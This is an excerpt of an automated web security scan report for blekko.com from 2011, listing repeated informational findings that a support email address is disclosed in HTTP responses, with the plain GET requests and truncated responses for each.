Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/help

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/help HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:40 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.44. http://blekko.com/ws/+/ip=128.83.114.63 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=128.83.114.63

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=128.83.114.63 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:54 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.45. http://blekko.com/ws/+/ip=128.83.114.63+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=128.83.114.63+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=128.83.114.63+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:21 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.46. http://blekko.com/ws/+/ip=173.236.153.56 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=173.236.153.56

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=173.236.153.56 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:31 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.47. http://blekko.com/ws/+/ip=173.236.153.56+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=173.236.153.56+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=173.236.153.56+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:58 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.48. http://blekko.com/ws/+/ip=174.136.98.194 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=174.136.98.194

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=174.136.98.194 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:44 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.49. http://blekko.com/ws/+/ip=174.136.98.194+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=174.136.98.194+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=174.136.98.194+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:12 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.50. http://blekko.com/ws/+/ip=204.9.177.195 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=204.9.177.195

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=204.9.177.195 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:28 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.51. http://blekko.com/ws/+/ip=204.9.177.195+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=204.9.177.195+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=204.9.177.195+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.52. http://blekko.com/ws/+/ip=207.46.19.254 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=207.46.19.254

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=207.46.19.254 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:47 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.53. http://blekko.com/ws/+/ip=207.46.19.254+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=207.46.19.254+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=207.46.19.254+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:16 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.54. http://blekko.com/ws/+/ip=207.97.227.239 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=207.97.227.239

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:39 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.55. http://blekko.com/ws/+/ip=207.97.227.239+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=207.97.227.239+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=207.97.227.239+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:04 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.56. http://blekko.com/ws/+/ip=208.80.152.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=208.80.152.2

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=208.80.152.2 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.57. http://blekko.com/ws/+/ip=208.80.152.2+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=208.80.152.2+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=208.80.152.2+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.58. http://blekko.com/ws/+/ip=209.107.213.19 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=209.107.213.19

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=209.107.213.19 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:42 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.59. http://blekko.com/ws/+/ip=209.107.213.19+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=209.107.213.19+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=209.107.213.19+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:11 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.60. http://blekko.com/ws/+/ip=216.34.181.96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=216.34.181.96

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=216.34.181.96 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.61. http://blekko.com/ws/+/ip=216.34.181.96+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=216.34.181.96+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=216.34.181.96+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:14 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.62. http://blekko.com/ws/+/ip=216.48.3.18 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=216.48.3.18

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=216.48.3.18 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.63. http://blekko.com/ws/+/ip=216.48.3.18+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=216.48.3.18+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=216.48.3.18+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:02 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.64. http://blekko.com/ws/+/ip=64.15.79.182 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=64.15.79.182

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=64.15.79.182 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.65. http://blekko.com/ws/+/ip=64.15.79.182+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=64.15.79.182+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=64.15.79.182+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.66. http://blekko.com/ws/+/ip=65.55.11.162 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=65.55.11.162

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=65.55.11.162 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.67. http://blekko.com/ws/+/ip=65.55.11.162+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=65.55.11.162+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=65.55.11.162+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:08 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.68. http://blekko.com/ws/+/ip=71.41.152.29 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=71.41.152.29

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=71.41.152.29 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.69. http://blekko.com/ws/+/ip=71.41.152.29+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=71.41.152.29+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=71.41.152.29+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:51 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.70. http://blekko.com/ws/+/ip=72.14.213.132 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=72.14.213.132

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=72.14.213.132 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:55 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.71. http://blekko.com/ws/+/ip=72.14.213.132+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=72.14.213.132+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=72.14.213.132+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:24 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.72. http://blekko.com/ws/+/ip=72.32.187.73 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=72.32.187.73

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=72.32.187.73 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.73. http://blekko.com/ws/+/ip=72.32.187.73+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=72.32.187.73+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=72.32.187.73+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:56 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.74. http://blekko.com/ws/+/ip=72.32.255.178 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=72.32.255.178

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=72.32.255.178 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.75. http://blekko.com/ws/+/ip=72.32.255.178+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=72.32.255.178+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=72.32.255.178+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:22 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.76. http://blekko.com/ws/+/ip=74.125.19.132 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=74.125.19.132

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=74.125.19.132 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:56 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.77. http://blekko.com/ws/+/ip=82.165.200.22+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=82.165.200.22+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=82.165.200.22+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
